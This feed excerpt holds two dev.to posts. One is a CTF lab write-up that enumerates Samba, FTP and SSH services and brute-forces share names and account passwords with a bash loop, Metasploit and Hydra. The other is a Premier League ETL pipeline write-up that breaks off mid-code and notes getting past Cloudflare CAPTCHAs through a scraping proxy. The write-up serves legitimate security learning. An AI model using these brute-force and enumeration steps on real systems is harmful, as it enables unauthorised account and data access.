      <description>&lt;p&gt;Hello or welcome back, depending on whether you read my past article. This one details another CTF along my learning path. It focused on enumeration techniques to identify and analyze running services on the target machine. The challenge required me to apply my knowledge of network and system enumeration to identify misconfigurations, weak credentials and potential security vulnerabilities. I had to capture the following 4 flags, and this article details how I went about that.&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 1
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: There is a samba share that allows anonymous access. Wonder what's in there!&lt;/p&gt;

&lt;p&gt;My first step was to ping the target to confirm that it was reachable, then run an nmap scan to discover the ports on which samba was running. I also used a few NSE scripts to further enumerate the ports. To enumerate the shares, I used enum4linux to determine which shares allowed anonymous login.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr21e7bb83diaarca36dr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr21e7bb83diaarca36dr.png" alt="enum4linux" width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;
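
&lt;p&gt;A minimal sketch of this enumeration, using the lab hostname that appears later in this article. The flags shown are one reasonable choice, not necessarily the ones behind the screenshot.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -S lists shares, -U lists users
enum4linux -S -U target.ine.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;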

&lt;p&gt;The results showed that there were two shares, but neither allowed anonymous access. This meant that finding the share containing the flag required brute-forcing share names. A wordlist was provided for this, and with a little help from ChatGPT, I came up with a simple script to loop through each share name in the wordlist and test whether anonymous access was allowed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;for share in $(cat your_wordlist.txt); do smbclient -N \\\\TARGET_IP\\$share -c "ls" 2&amp;gt;/dev/null &amp;amp;&amp;amp; echo "[+] FOUND SHARE: $share"; done

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's a brief explanation of the script:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;for share in ...&lt;/code&gt;: loops through every entry in your wordlist (one share name per line, without spaces).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;smbclient ... \\$share&lt;/code&gt;: attempts to connect to that specific share name without a password (&lt;code&gt;-N&lt;/code&gt;) and list its contents.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;2&amp;gt;/dev/null&lt;/code&gt;: silences the "Bad Network Name" errors so the screen isn't flooded with failures.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;&amp;amp;&amp;amp; echo ...&lt;/code&gt;: only prints the name if the connection is successful.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After saving the script to a file and making it executable, I ran it to identify the share that allowed anonymous access. The share found was &lt;code&gt;pubfiles&lt;/code&gt;, which holds the first flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5a99cqha4rl8frk087h8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5a99cqha4rl8frk087h8.png" alt="script result" width="609" height="142"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Access the share with smbclient, using the command&lt;br&gt;
&lt;code&gt;smbclient //target.ine.local/pubfiles -N&lt;/code&gt;&lt;br&gt;
After downloading the file to our local system using the get command, we can view its contents and find the first flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fma7zvv11urq3nlzsitoj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fma7zvv11urq3nlzsitoj.png" alt="Flag 1" width="322" height="62"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 2
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: One of the samba users have a bad password. Their private share with the same name as their username is at risk!&lt;/p&gt;

&lt;p&gt;In the enum4linux results in the previous step, I found a few usernames, and as the hint suggests, one of these users has a weak password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0jck26phziid9q3ex62.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0jck26phziid9q3ex62.png" alt="enumusers" width="720" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I used Metasploit's &lt;code&gt;smb_login&lt;/code&gt; module to brute-force the samba users' passwords. I created a simple text file containing the usernames found and set it as the &lt;code&gt;user_file&lt;/code&gt;. The file containing the passwords to be tried was also provided. After setting all the required options and running the module, the results showed the user and the weak password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87fgey1bc8k4swfcyl8a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87fgey1bc8k4swfcyl8a.png" alt="weakuser" width="800" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hint says that the share with the same name as their username is the one at risk, so access the share using smbclient:&lt;br&gt;
&lt;code&gt;smbclient //target.ine.local/josh -U josh&lt;/code&gt;&lt;br&gt;
Again, download the file found and view its contents to get the second flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07rwutaw1h3wmfoqdja6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07rwutaw1h3wmfoqdja6.png" alt="flag2" width="720" height="160"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F520efukdjukkbr0myio3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F520efukdjukkbr0myio3.png" alt="flag2" width="625" height="94"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 3
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: Follow the hint given in the previous flag to uncover this one.&lt;/p&gt;

&lt;p&gt;The hint for this flag was left with the previous flag: it suggested that there's an FTP service running and that we should check its banner. To find the service and the port it's running on, I used nmap and found it on port 5554.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9plfw4njm46aea2kdx82.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9plfw4njm46aea2kdx82.png" alt="nmap" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;
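
&lt;p&gt;Because the service sits on a non-standard port, a default scan can miss it. A scan along these lines would find it; treat it as a sketch, since the exact options used are only visible in the screenshot.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# -p- scans all 65535 TCP ports, -sV identifies the service behind each open port
nmap -p- -sV target.ine.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;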

&lt;p&gt;Connecting with the &lt;code&gt;ftp&lt;/code&gt; command displays a banner warning that the accounts ashley, alice and amanda have weak passwords that should be changed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmygjyqwajcghr726dk24.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmygjyqwajcghr726dk24.png" alt="ftpbanner" width="720" height="54"&gt;&lt;/a&gt;&lt;/p&gt;
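
&lt;p&gt;The same banner can be read without an FTP client, because the server sends its greeting as soon as a TCP connection opens. The snippet below is a minimal sketch of that idea rather than part of the lab; the function name &lt;code&gt;grab_banner&lt;/code&gt; is made up for illustration, and it only returns the first chunk the server sends.&lt;/p&gt;

```python
import socket


def grab_banner(host, port, timeout=5.0):
    """Connect to host:port and return the first chunk of data the server sends."""
    # create_connection resolves the host and applies the timeout to the socket.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(1024)
    # Banners are normally ASCII; replace anything undecodable instead of failing.
    return data.decode("utf-8", errors="replace").strip()
```

&lt;p&gt;Calling &lt;code&gt;grab_banner("10.0.0.5", 5554)&lt;/code&gt; would print the greeting, where the address is a placeholder for a target you are authorised to test. A long banner may arrive in several chunks, so a fuller version would keep reading until the connection goes quiet.&lt;/p&gt;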

&lt;p&gt;The next step was to brute-force these accounts, and the tool I used was Hydra.&lt;br&gt;
I added the newly discovered usernames to the &lt;code&gt;users.txt&lt;/code&gt; file I had created earlier, ran Hydra against the FTP service, and found the weak password:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pii6hk023afh0ks3uv7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pii6hk023afh0ks3uv7.png" alt="WeakUser2" width="800" height="108"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Metasploit also has a module, &lt;code&gt;ftp_login&lt;/code&gt;, that can do the same job. I tried it out and got the same result.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwwjw0mshpvo9rzx7rud.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwwjw0mshpvo9rzx7rud.png" alt="ftp_login" width="658" height="125"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With the credentials in hand, connecting to the FTP service and retrieving the flag was simple.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnrz0if1zksdntkzhxro.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnrz0if1zksdntkzhxro.png" alt="flag3" width="800" height="316"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 4
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: This is a warning meant to deter unauthorized users from logging in.&lt;br&gt;
Some research showed that an SSH banner is a message an administrator configures on the server to warn users before they authenticate. That suggested the flag was in the banner, and connecting to the SSH service displayed both the banner and the final flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngsszw6kre4hzo7dg6xv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngsszw6kre4hzo7dg6xv.png" alt="flag4" width="669" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentest</category>
    </item>
    <item>
      <title>Building an Automated Data Pipeline: Injuries vs Performance in the Premier League</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 22 Oct 2025 14:31:49 +0000</pubDate>
      <link>https://dev.to/james_kariuki/building-an-automated-data-pipeline-injuries-vs-performance-in-the-premier-league-53c7</link>
      <guid>https://dev.to/james_kariuki/building-an-automated-data-pipeline-injuries-vs-performance-in-the-premier-league-53c7</guid>
      <description>&lt;p&gt;Having spent the better part of the last two months learning the basics of data engineering, I wanted to build a project to test my understanding of the concepts. This article documents the process of building an automated ETL pipeline using Python, PostgreSQL, and Apache Airflow — including the bugs, the lessons learned, and the insights drawn from the data.&lt;/p&gt;

&lt;p&gt;I settled on analyzing whether player injuries contributed to the worst season in Manchester United’s recent history. The club cited injuries as a major reason for their poor performance, but I wasn’t convinced. Since data rarely lies, I decided to test that claim myself by combining injury data and team performance statistics, using my newly acquired data engineering skills.&lt;/p&gt;

&lt;p&gt;What started as a curiosity about one team quickly turned into a league-wide project.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Language: Python&lt;/li&gt;
&lt;li&gt;Database: PostgreSQL&lt;/li&gt;
&lt;li&gt;Orchestration: Apache Airflow&lt;/li&gt;
&lt;li&gt;Libraries: BeautifulSoup, Requests, psycopg2&lt;/li&gt;
&lt;li&gt;Tools: ScraperAPI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The GitHub repo for this project can be found &lt;a href="https://github.com/Menjez/prem-injury-analysis" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  ETL Process
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Data Extraction
&lt;/h3&gt;

&lt;p&gt;The project began by obtaining raw data from two main sources:&lt;br&gt;
&lt;a href="https://www.premierinjuries.com/newsroom/injury-data" rel="noopener noreferrer"&gt;Premier Injuries&lt;/a&gt; – for player injury data&lt;br&gt;
&lt;a href="https://understat.com/league/EPL" rel="noopener noreferrer"&gt;Understat&lt;/a&gt; – for match and player statistics&lt;/p&gt;
&lt;h4&gt;
  
  
  a. Injury Data
&lt;/h4&gt;

&lt;p&gt;To scrape injury data, I initially tried Selenium, but quickly ran into Cloudflare’s human verification challenge (the “I’m not a robot” checkbox).&lt;br&gt;
After experimenting with Playwright, I found a more reliable solution — ScraperAPI, a service that handles CAPTCHAs and rotating proxies automatically.&lt;/p&gt;

&lt;p&gt;Using ScraperAPI with BeautifulSoup, I extracted HTML content and parsed the table containing injury data:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
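&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_injury_data&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;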
    &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;api_key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;your_api_key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;url&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://www.premierinjuries.com/injury-table.php&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;render&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; 
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://api.scraperapi.com/&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;soup&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;html.parser&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Basic validation — check that the table or expected content exists
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;table&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Expected injury table not found in the page HTML.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function fetches the rendered page via ScraperAPI and returns the parsed HTML tree for later processing.&lt;/p&gt;

&lt;h4&gt;
  
  
  b. Performance Data
&lt;/h4&gt;

&lt;p&gt;Next, I needed the match statistics so that I could compare each team's performance when certain players were unavailable through injury with its performance when they were fit and playing. I scraped this data from the Understat website, which embeds it as JSON inside the JavaScript code on the page. I first sent the HTTP request, then parsed the HTML response with BeautifulSoup and collected the script tags from the page. I then looped through each script tag looking for the &lt;code&gt;datesData&lt;/code&gt; variable, where the match information is stored, and extracted the JSON string. The JavaScript code on the page looks something like this:&lt;br&gt;
&lt;code&gt;var datesData = JSON.parse('{"2024-08-16":[{"id":"12345",...}]}');&lt;/code&gt;&lt;br&gt;
The loop slices out the text between &lt;code&gt;JSON.parse('&lt;/code&gt; and the closing &lt;code&gt;')&lt;/code&gt;, which for the example above is &lt;code&gt;{"2024-08-16":[{"id":"12345",...}]}&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The resulting JSON string contains escaped characters, such as apostrophes and backslashes, that must be converted into the characters they represent before the string can be parsed into a Python data structure and returned by the function. Extracting player statistics followed much the same process, except that I looked for the &lt;code&gt;playersData&lt;/code&gt; variable instead.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
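&lt;pre class="highlight python"&gt;&lt;code&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_match_data&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;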
    &lt;span class="c1"&gt;#Send HTTP request
&lt;/span&gt;    &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://understat.com/league/EPL/2024&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
    &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;#Parse response
&lt;/span&gt;    &lt;span class="n"&gt;soup&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;lxml&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;#find and loop through &amp;lt;script&amp;gt; tags to find relevant info and extract JSON string
&lt;/span&gt;    &lt;span class="n"&gt;script_tags&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;script&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;script_tags&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;datesData&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;raw_text&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;script&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt;
            &lt;span class="n"&gt;start&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;JSON.parse(&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;JSON.parse(&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;end&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;find&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;json_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_text&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;end&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="n"&gt;decoded_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json_str&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unicode_escape&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
